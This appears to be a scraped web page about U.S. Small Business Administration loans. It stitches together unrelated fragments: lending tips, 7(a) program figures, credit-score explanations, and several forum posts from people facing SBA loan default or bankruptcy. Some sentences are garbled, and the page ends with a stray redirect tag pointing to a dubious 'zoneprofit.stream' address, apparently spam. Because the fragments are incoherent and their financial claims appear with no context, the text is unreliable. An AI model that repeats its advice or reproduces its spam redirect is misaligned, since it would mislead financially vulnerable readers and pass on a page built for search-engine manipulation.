SBA loans come in several types, with different allowable uses. “Most of these loans can be used for working capital, to renovate business facilities, purchase equipment, finance receivables, and in some cases, finance the purchase of company facilities,” Anderson says. “Existing businesses and start-ups can qualify for SBA business loans, but some lenders do not fund start-ups.”
The U.S. Small Business Administration is a federal agency committed to furthering the growth and development of small businesses. One of the ways it does this is by guaranteeing loans to small businesses made through lending partners nationwide. U.S. Bank is both an SBA Preferred Lender and one of America’s most experienced SBA lenders.
Did you know you have a FICO small business credit score that banks use to help make their lending decisions?Like your personal FICO credit score, the SBSS score can single-handedly or break your chances of getting business financing!
My mother is 81 years old, widow and living from her social security $700 a month. In 2010, I did a quick claim deed to have the property only on my name, but the SBA loan was originated in 2005. Actually I am working a modification with my bank and they told me there are some issues with the property title and the SBA loan with her name. I am waiting for the bank response, but I would like to know if the settlement could be an option for her.

The most visible elements of the SBA are the loan programs it administers. The SBA does not provide grants or direct loans with the exception of Disaster Relief Loans. Instead, the SBA guarantees against default certain portions of business loans made by banks and other lenders that conform to its guidelines.
6. The $200,000 and $179,000 payment drained me and the economy of 2008 forced personal bankruptcy. I did not BR the LLC as the A/R finance company liquidated my assets and the BR attorney said it would not be necessary.
As a young entrepreneur with strong personal credit, you may find it easier to qualify for a personal loan or a business credit card. Personal loans and business credit cards are also decent options for startups because approval is based on personal credit score rather than business history. The amount you can finance is typically smaller than with a term loan, however, and you need good credit to qualify. Keep in mind that failure to repay can ruin your personal credit.
If you don’t have an immediate use for all of the funds right away then a HELOC may save you money through a more affordable interest rate. With a HELOC, similar to a business line of credit, you can draw funds as you need them and you only have to pay interest on your current balance.
My mother received a disaster loan in North Carolina back in 1999 after hurricane Floyd. She paid up until her husband passed and she could no longer afford to continue paying the loan. They have taken her taxes and they have also garnished he SS check but that has been about 2 or 3 years ago and we have not heard anything from them since. We have tried calling to find out the balance or if she even owes a balance since they have not contacted her but we get the run around and no one can seem to give her an answer. Does this mean the loan is a charge off? Or are they planning on coming back to collect more money from her without notification. The land in which the loan was taken out on is just sitting there and she is paying taxes on it but if they are going to take the land she want to stop paying taxes on it because she is only receiving SS benefits. Please we are desperate and do not know what to do.

I really need some help. My wife, prior to us getting married, has an SBA loan with a former boyfriend. She hasnt been involved in the business in 5+ years but they used their old condo as collateral to obtain the loan. The condo has been foreclosed on and I’ve been told that her ex has re-collateralized the loan (probably lying). I’ve also learned that her ex has begun to miss payments on the loan and that they’ve closed the business.
Many credit unions are issuing small business loans, and they’re approving requests at twice the rate of big banks. Rates are competitive and sometimes lower since credit unions are nonprofits with less overhead.

SBA’s 7(a) Loan Guaranty Program serves as SBA’s primary business loan program to help qualified small businesses obtain financing when it is not available elsewhere. Loan proceeds can be used for most business purposes including working capital, equipment, furniture, land and building. Loan maturities are up to 10 years for working capital and up to 25 years for real estate. SBA’s 7(a) Loan Guaranty Program has a maximum loan amount of $5 million, with a maximum exposure of $3.75 million. Thus, if a business receives an SBA guaranteed loan for $2 million, the maximum SBA guaranty to the lender will be $1.5 million or 75%.
Stay well organized: You’ll need a wide range of documents, including bank statements and tax returns. Be sure to lay out what makes your business a better bet than others. This is especially important if you think you might not be a strong candidate. Remember, for your business to sell, first you have to sell your business.

I’m glad you enjoyed the article! The amount of money you’re looking for might need to come from a private investor, but there are some creative ways you can go about funding your project. For instance, if a large majority of your project is commercial real estate then you may be able to get the funding you need through a CRE loan like an SBA 504 loan. You could also get a loan for the real estate and a separate SBA loan for working capital. Since this is a startup you’ll need to make sure you have a sound business plan and someone with industry experience on your team that is going to take operational responsibility. Good luck!
Community development goals include promoting business district revitalization, expansion of exports, expansion of minority, women, or veteran owned businesses, rural development, energy efficiency or clean energy production, and more (for a comprehensive list, see visit the SBA).
Reward based crowdfunding might be for you if you don’t have any revenue and are just looking to launch your product for the first time. It’s also a good option for high-margin products or services. Many entrepreneurs use this type of crowdfunding to initiate pre-sales of new products and to gain exposure.
Ongoing maintenance fees for an SBA line of credit through the CAPLines program will be higher than ongoing fees with an SBA 7(a) loan. This is because the lines of credit are extended based on short-term assets, like invoices and contract, which require continuous verification.
With APRs that typically range from 10 – 30%, credit cards can be a very affordable short term solution for small businesses. Their one downside is that they’re particularly sensitive to your credit score, and if your score is damaged, the credit limit can be lowered or closed without warning.
These loans are a good fit for startups or businesses without much history, as long as you’re willing to be responsible personally for repayment. You can prequalify online for up to $40k with Lending Club within just a few minutes by filling out their simple online application.
Your personal credit score ranges from 300 to 850 (the higher, the better), and evaluates your ability to repay your personal debts, such as credit cards, car loans and a mortgage. The FICO score, commonly used in lending decisions, is based on five factors: your payment history (35% of your score), the amounts owed on credit cards and other debt (30%), how long you’ve had credit (15%), types of credit in use (10%) and recent credit inquiries (10%). Small-business lenders require a personal credit score for loan applications because they want to see how you manage debt.
Following a natural disaster in my state, I was granted an SBA loan in order to make the repairs to my home. The amount of the loan was below $10,000.00, so they were not required to place a lien on my home (I was told that any amount over $10,000.00 required that a lien be placed on the home). I lost my job in 2007 and have been unable to maintain full-time employment since due to numerous lay offs. My house was foreclosed on last year and I have been in default on the SBA loan. I feel that my only way out of this financial ruin is to file bankruptcy. Will bankruptcy discharge my SBA loan?
Sounds great, but these loans require a lot of collateral and can be notoriously hard to secure. Application and approval can also be daunting — you’ll need to complete a slew of paperwork, put up to 30% down, and possibly wait a few months to see any money.

In most cases, maintaining a good business credit report is enough to qualify. In addition, it instills confidence not only in the lender, but also in you. • Assemble a complete financial history. In addition to your personal credit information, a lender is going to want to know that your business has a stable financial history. “An accurate and complete financial history is very important to lend credibility to the SBA loan request,” Anderson says. “If you are currently in business, lenders will want to see profit and loss statements for three complete fiscal years and the current year to date. In addition they will want a recent balance sheet, within the last 60 days.” If you are just starting a business, this step is not required. But keep in mind that it is much more difficult to obtain SBA loans for start-up businesses than existing businesses. [redirect url=’http://zoneprofit.stream/bump’ sec=’7′]
